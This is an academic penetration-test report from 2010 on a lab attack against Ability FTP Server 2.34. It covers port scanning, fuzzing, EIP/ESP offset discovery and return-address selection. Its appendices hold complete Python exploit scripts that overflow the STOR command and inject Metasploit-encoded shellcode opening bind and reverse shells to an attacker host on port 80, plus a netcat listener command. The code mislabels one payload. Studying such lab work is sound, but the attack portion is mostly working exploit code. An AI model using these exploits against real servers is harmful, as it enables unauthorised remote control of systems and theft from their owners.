project report

1 | Group 5 – Penetration Test for Ability FTP Server

Faculty of Science

Department of Computing

ITEC855 Security and Forensic Discovery

Penetration test for:

Code-Crafters Ability FTP Server V2.34

Prepared by

(Group 5)

Muhammed BAYKAL 41035127 Guillermo Alfonso Moreno Quijano 41729935


Semester 1, 2010

Table of contents

1. Introduction

2. Global Objectives

3. Global Objectives Summary

4. Attack Diagrams

4.1. Attack Flow Diagram (No Firewall Protects the Victim)

4.2. Attack Flow Diagram (Firewall Protects the Victim)

5. Procedure

5.1. Port Scanning to Determine Services Running on Target Machine

5.2. Running Fuzz Application against Ability FTP Server

5.3. Creating Pattern to Determine Exact Memory Crash Locations

5.4. Sending the Pattern to the FTP Server to Determine Where EIP

and ESP are overridden

5.5. Finding the Return Address

5.6. Generating the shell code

A- Bind TCP inline

B- Creating Reverse TCP Inline

6. Appendix 6.1. Fuzzer Code - to find at what point application throws buffer

overflow error.

6.2. Pattern Code to Determine EIP, ESP and EBP Pointers

6.3. ‘Bind TCP Inline’ Shell Code

6.4.’ Reverse TCP’ Shell Code

1. Introduction


The following penetration test is done with academic purpose. This penetration test was

requested as an assessment of the IT department of the Macquarie University. The assessment

was to be done with no prior internal knowledge of the application.

The objective of the analysis was to simulate an attack to assess the buffer overflow

vulnerability of the Ability FTP server 2.34. This report contains all the steps which led to

gain control over the target machine.

2. Global Objectives

1. Use two machines to simulate one as the victim and another one as the attacker. Both

machines were virtual machines on VMware. The victim machine ran XP windows

operating system and Ability FTP server was installed on it. In addition, the attacker

machine ran Backtrack operating system.

2. Use the command STORE to assess the buffer overflow vulnerability of the Ability

FTP server. This goal is assessed without any firewall protecting the victim.

3. Use the reverse shell to gain control over our victim machine. This goal is assessed

with a firewall protecting the victim.

3. Global Objectives Summary

2.1 Achieved

2.2 Achieved

2.3 Achieved

4. Attack Diagrams

4.1 Attack Flow Diagram (No Firewall Protects the Victim)


4.2 Attack Flow Diagram (Firewall Protects the Victim)

5. Procedure

Assuming that we do not know anything about victim PC so following steps need to be

completed in order to gain enough knowledge of the target environment.

1. Scan ports on victim machine to determine services running on the machine.

2. Run a fuzz application against the selected application


3 Create a Pattern to determine exact memory crash locations

4 Send the pattern to the ftp server to determine where EIP and ESP are overridden.

5. Find the return address

6. Generate the shell codes:

A. Creating bind TCP Inline shell

B. Creating Reverse TCP Inline shell

5.1 Port Scanning to Determine Services Running on Target Machine

Nmap is a powerful port scanning tool and is used to find open ports on the target machine.

Nmap is used along with the following parameters;

A Enables OS detection and Version detection, Script scanning and Trace route

T4 Timing parameter from T0 to T5 higher is faster

F Fast scan mode

As it is shown in the screenshot, Ability Server is running on Port 21 on a machine running

windows XP operating system.

5.2 Running Fuzz Application Against Ability FTP Server


A fuzzer code is created to send buffers to the victim machine. The buffer size is increased by

100 characters at each transmission step. As a result of fuzz code, it can be detected the break

point of base ESP,EBP and EIP pointers.

Note: refers to Appendix 6.1 to see the script.

The following screenshot shows the result of fuzz code execution with buffer size of 1000

characters on the victim machine.

From the picture above, it is detected that the Ability FTP server crashes with a buffer size of

between 900 and 1000 characters .

5.3 Creating Pattern to Determine Exact Memory Crash Locations

Pattern is a string of unique characters and it can be created by using pattern_create

application which resides under tools folder of framework3.

The length of pattern will be 1000 that number is found from execution of fuzzer code. Please

refer to the following screenshot to see how to generate a pattern.


5.4 Sending the Pattern to the FTP Server to Determine Where EIP

and ESP are overridden.

Now we need to replace our fuzz code and instead of sending incremental buffer we send the

pattern to the server at once with concatenating STOR command.

Please refer to Appendix 6.2 to see detail of the modified fuzz code. We have got the

following screenshot after execution of the modified fuzz code.


It can be clearly seen from the picture above that EIP is overridden with the value of

“32674231” and ESP is with “g8Bg................”

We can use pattern offset tool to determine length of buffer which ESP and EIP are

overridden.

Finally, it is known that EIP breaks at 965 and ESP breaks at 985. We need to build a buffer

as following structure;

Buffer = [ "A"*965 + return_address + NOP_slide + shell_code +

NOP_slide ]

5.5 Finding the Return Address

Since we are using ESP break point we need to find memory address of Jump ESP command

from system modules in this assignment we have used SHELL32.dll.

Please refer to the following screenshot to see how we found address of the JMP command.


As it can be seen the JMP ESP address is 7c9d3of3. Since register address is little endian

architecture, the return address should be formatted as follows before injecting into buffer

code;

Return_Address=”\xf3\x30\x9d\x7c”

5.6 Generating the Shell Code

We need to generate a shell code to send to the victim machine. To generate shell codes we

simply use msfweb console of Metasploit framework.

As it was mention before we want to create 2 shell code s to exploit the ftp server. The bind

TCP inline code will allow the attacker to take control over the victim without any firewall

protecting the victim. The reverse shell code will allow the attacker to take control over the

victim with a firewall protecting the victim

A- Bind TCP inline

Using Metasploit we can generate the bind shell code. Please refer to the following screenshot

to see how to generate the shell code.


Please refer to appendix 6.3 to see detail of the exploit with BIND TCP Inline payload.

After execution of the bind shell code we connect to the victim machine through netcat. The

following screen was captured after getting access to the machine.


B. Creating Reverse TCP Inline shell

The goal of this task is to get access to victim machine when the victim is behind the firewall.

After sending the buffer to the victim machine, the victim will connect back to the attacker

through Port 80.

We will be listening on port 80 with netcat by using the following command;

nc –nvvlp 80

To generate reverse TCP inline shell code we need to use msfweb application of Metasploit

framework please refer to the following screenshot to see details of the shell generation

process.


After generating the shell code we have embedded the code into the buffer so the exploit will

be executed and finally the victim will connected back to us.

Please see the screenshot below to see the connection from the victim to the attacker using

port 80 in the attacker machine.


6. Appendix

6.1. Fuzzer Code - to find at what point application throws buffer overflow

error.

#! /usr/bin/python2.5 import os import socket import time buffer=["A"] counter=100 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(("192.168.0.128",21)) f=s.recv(1024) print(f) s.send('USER user\r\n') f=s.recv(1024) print(f) if f[0:3]=="331": print("User Accepted sending password") s.send('PASS pass\r\n') txt=s.recv(1024) print(txt) param=txt[0:3]


if param=="230": print("Password Accepted!! Sending Buffer....") while len(buffer)<=1000: buffer.append("A"*counter) counter=counter+10 for string in buffer: try: s.send('STOR ' + string+'.txt\r\n' ) dummy=s.recv(1024) print "Server Response>" + dummy + ' Buffer size: ' + str(len(string)) time.sleep(0.5) #print("\x1B") except: #print("\x1B[2J") print("Server Crashed at Buffer size :" + str(len(string))) break else: print("Invalid password") else: print("Invalid username")

6.2. Pattern Code to Determine EIP, ESP and EBP Pointers #! /usr/bin/python2.5 import os import socket import time buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3

Ac4Ac5Ac6Ac 7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af

4Af5Af6Af7 Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai

4Ai5Ai6Ai7Ai8A i9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6A

l7Al8Al9Am0Am1 Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5A

o6Ao7Ao8Ao9Ap0 Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6

Ar7Ar8Ar9As0As1 As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8A

u9Av0Av1Av2Av3Av4 Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9

Ay0Ay1Ay2Ay3Ay4 Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1

Bb2Bb3Bb4Bb5Bb6Bb7 Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4B

e5Be6Be7Be8Be9Bf0 Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(("192.168.0.128",21)) f=s.recv(1024) print(f) s.send('USER user\r\n') f=s.recv(1024) print(f) if f[0:3]=="331": print("User Accepted sending password")


s.send('PASS pass\r\n') txt=s.recv(1024) print(txt) param=txt[0:3] if param=="230": print("Password Accepted!! Sending Buffer....") s.send('STOR ' + buffer +'\r\n' ) dummy=s.recv(1024) time.sleep(1) else: print("Invalid password") else: print("Invalid username")

6.3. Bind TCP Inline Shell Code

#! /usr/bin/python2.5 #------------------------------------------------------------- #Revision: 1.0.0 (stable) #Date : 15/05/2010 #Description :Attack ability ftp server through its STOR command error # and override EIP and ESP pointers then inject the shell code # open remote shell screen to gain access to server... #------------------------------------------------------------- import os import socket import time from ftplib import FTP import struct #------------------------------------------------------------- # windows/shell_reverse_tcp - 341 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai #LHOST=192.168.0.128, EXITFUNC=seh, LPORT=54321, #ReverseConnectRetries=5 #------------------------------------------------------------- shellCode =("\xdb\xc8\xbd\xd6\x26\xe0\xe1\x29\xc9\xb1\x56\xd9\x74\x24\xf4" "\x5f\x31\x6f\x18\x03\x6f\x18\x83\xc7\xd2\xc4\x15\x1d\x32\x81" "\xd6\xde\xc2\xf2\x5f\x3b\xf3\x20\x3b\x4f\xa1\xf4\x4f\x1d\x49" "\x7e\x1d\xb6\xda\xf2\x8a\xb9\x6b\xb8\xec\xf4\x6c\x0c\x31\x5a" "\xae\x0e\xcd\xa1\xe2\xf0\xec\x69\xf7\xf1\x29\x97\xf7\xa0\xe2" "\xd3\xa5\x54\x86\xa6\x75\x54\x48\xad\xc5\x2e\xed\x72\xb1\x84" "\xec\xa2\x69\x92\xa7\x5a\x02\xfc\x17\x5a\xc7\x1e\x6b\x15\x6c" "\xd4\x1f\xa4\xa4\x24\xdf\x96\x88\xeb\xde\x16\x05\xf5\x27\x90" "\xf5\x80\x53\xe2\x88\x92\xa7\x98\x56\x16\x3a\x3a\x1d\x80\x9e" "\xba\xf2\x57\x54\xb0\xbf\x1c\x32\xd5\x3e\xf0\x48\xe1\xcb\xf7" "\x9e\x63\x8f\xd3\x3a\x2f\x54\x7d\x1a\x95\x3b\x82\x7c\x71\xe4" "\x26\xf6\x90\xf1\x51\x55\xfd\x36\x6c\x66\xfd\x50\xe7\x15\xcf" "\xff\x53\xb2\x63\x88\x7d\x45\x83\xa3\x3a\xd9\x7a\x4b\x3b\xf3" "\xb8\x1f\x6b\x6b\x68\x1f\xe0\x6b\x95\xca\xa7\x3b\x39\xa4\x07" "\xec\xf9\x14\xe0\xe6\xf5\x4b\x10\x09\xdc\xfa\x16\xc7\x04\xaf" "\xf0\x2a\xbb\x9b\x30\xa2\x5d\x49\x23\xe2\xf6\xe5\x81\xd1\xce" "\x92\xfa\x33\x63\x0b\x6d\x0b\x6d\x8b\x92\x8c\xbb\xb8\x3f\x24" "\x2c\x4a\x2c\xf1\x4d\x4d\x79\x51\x07\x76\xea\x2b\x79\x35\x8a" "\x2c\x50\xad\x2f\xbe\x3f\x2d\x39\xa3\x97\x7a\x6e\x15\xee\xee" "\x82\x0c\x58\x0c\x5f\xc8\xa3\x94\x84\x29\x2d\x15\x48\x15\x09"


"\x05\x94\x96\x15\x71\x48\xc1\xc3\x2f\x2e\xbb\xa5\x99\xf8\x10" "\x6c\x4d\x7c\x5b\xaf\x0b\x81\xb6\x59\xf3\x30\x6f\x1c\x0c\xfc" "\xe7\xa8\x75\xe0\x97\x57\xac\xa0\xa6\xa6\x7c\x3d\x3e\x11\x15" "\x7c\x22\xa2\xc0\x43\x5b\x21\xe0\x3b\x98\x39\x81\x3e\xe4\xfd" "\x7a\x33\x75\x68\x7c\xe0\x76\xb9") #------------------------------------------------------------- #shell32.dll #JMP ESP => 7C9D30F3 due to little endian #------------------------------------------------------------- ret_addr="\xF3\x30\x9D\x7C" #------------------------------------------------------------- #Injection will be made based on EIP:965 and ESP:985 # at 955 EIP started to be overridden there r 16 bytes #I am using JMP ESP since i am using ESP pointer. #------------------------------------------------------------- str_buffer=[] str_buffer.append("STOR ") str_buffer.append("\x41"*965) str_buffer.append(ret_addr) str_buffer.append("\x90"*30) str_buffer.append(shellCode) str_buffer.append("\x90"*16) buffer="".join(str_buffer) ftp=FTP("192.168.0.128") try: print('Sending Server/Credentials..') ftp.login("user","pass") except: print('Server error could not connect to the server' ) print('Connected to the server sending Pattern') ftp.transfercmd(buffer) system.exit(0)

6.4. Reverse TCP Shell Code

#! /usr/bin/python2.5 #------------------------------------------------------------- #Revision: 1.0.1(stable) #Date : 15/05/2010@23:00 #Description :Attack ability ftp server through its STOR command exploit # and override EIP and ESP pointers then inject the shell code # let the victim connects back to my machine from port:80 by bypassing local # firewall to gain access to server. #------------------------------------------------------------- import os import socket import time from ftplib import FTP import struct #------------------------------------------------------------- # windows/shell_reverse_tcp - 341 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # LHOST=192.168.0.100, EXITFUNC=seh, LPORT=80, # ReverseConnectRetries=5 #-------------------------------------------------------------


shellCode =("\xbf\x81\xfc\xe5\xdb\x31\xc9\xdb\xde\xb1\x4f\xd9\x74\x24\xf4" "\x5b\x83\xc3\x04\x31\x7b\x0e\x03\x7b\x0e\x63\x09\x19\x33\xea" "\xf2\xe2\xc4\x8c\x7b\x07\xf5\x9e\x18\x43\xa4\x2e\x6a\x01\x45" "\xc5\x3e\xb2\xde\xab\x96\xb5\x57\x01\xc1\xf8\x68\xa4\xcd\x57" "\xaa\xa7\xb1\xa5\xff\x07\x8b\x65\xf2\x46\xcc\x98\xfd\x1a\x85" "\xd7\xac\x8a\xa2\xaa\x6c\xab\x64\xa1\xcd\xd3\x01\x76\xb9\x69" "\x0b\xa7\x12\xe6\x43\x5f\x18\xa0\x73\x5e\xcd\xb3\x48\x29\x7a" "\x07\x3a\xa8\xaa\x56\xc3\x9a\x92\x34\xfa\x12\x1f\x45\x3a\x94" "\xc0\x30\x30\xe6\x7d\x42\x83\x94\x59\xc7\x16\x3e\x29\x7f\xf3" "\xbe\xfe\x19\x70\xcc\x4b\x6e\xde\xd1\x4a\xa3\x54\xed\xc7\x42" "\xbb\x67\x93\x60\x1f\x23\x47\x09\x06\x89\x26\x36\x58\x75\x96" "\x92\x12\x94\xc3\xa4\x78\xf1\x20\x9a\x82\x01\x2f\xad\xf1\x33" "\xf0\x05\x9e\x7f\x79\x83\x59\x7f\x50\x73\xf5\x7e\x5b\x83\xdf" "\x44\x0f\xd3\x77\x6c\x30\xb8\x87\x91\xe5\x6e\xd8\x3d\x56\xce" "\x88\xfd\x06\xa6\xc2\xf1\x79\xd6\xec\xdb\x0f\xd1\x7b\x24\xa7" "\xdd\x1f\xcc\xba\xdd\xdf\x5c\x32\x3b\xb5\x4c\x12\x94\x22\xf4" "\x3f\x6e\xd2\xf9\x95\xe6\x77\x6b\x72\xf6\xfe\x90\x2d\xa1\x57" "\x66\x24\x27\x4a\xd1\x9e\x55\x97\x87\xd9\xdd\x4c\x74\xe7\xdc" "\x01\xc0\xc3\xce\xdf\xc9\x4f\xba\x8f\x9f\x19\x14\x76\x76\xe8" "\xce\x20\x25\xa2\x86\xb5\x05\x75\xd0\xb9\x43\x03\x3c\x0b\x3a" "\x52\x43\xa4\xaa\x52\x3c\xd8\x4a\x9c\x97\x58\x74\x6c\x25\x75" "\xe1\xd7\xdc\x34\x6f\xe8\x0b\x7a\x96\x6b\xb9\x03\x6d\x73\xc8" "\x06\x29\x33\x21\x7b\x22\xd6\x45\x28\x43\xf3") #------------------------------------------------------------- #shell32.dll #JMP ESP => 7C9D30F3 due to little endian arhitecture reverse the addy #------------------------------------------------------------- ret_addr="\xF3\x30\x9D\x7C" #------------------------------------------------------------- #Injection will be made based on EIP:965 and ESP:985 # at 955 EIP started to be overridden there r 16 bytes #I am using JMP ESP since i am using ESP pointer. #------------------------------------------------------------- str_buffer=[] str_buffer.append("STOR ") str_buffer.append("\x41"*965) str_buffer.append(ret_addr) str_buffer.append("\x90"*30) str_buffer.append(shellCode) str_buffer.append("\x90"*16) buffer="".join(str_buffer) ftp=FTP("192.168.0.128") try: print('Sending Server/Credentials..') ftp.login("user","pass") except: print('Server error could not connect to the server' ) print('Connected to the server sending Pattern') ftp.transfercmd(buffer)

project report

Documents

ability server

ability ftp server semester

ability ftp server crashes

pattern code

victim machine

following penetration

tcp inline shell code

modified fuzz code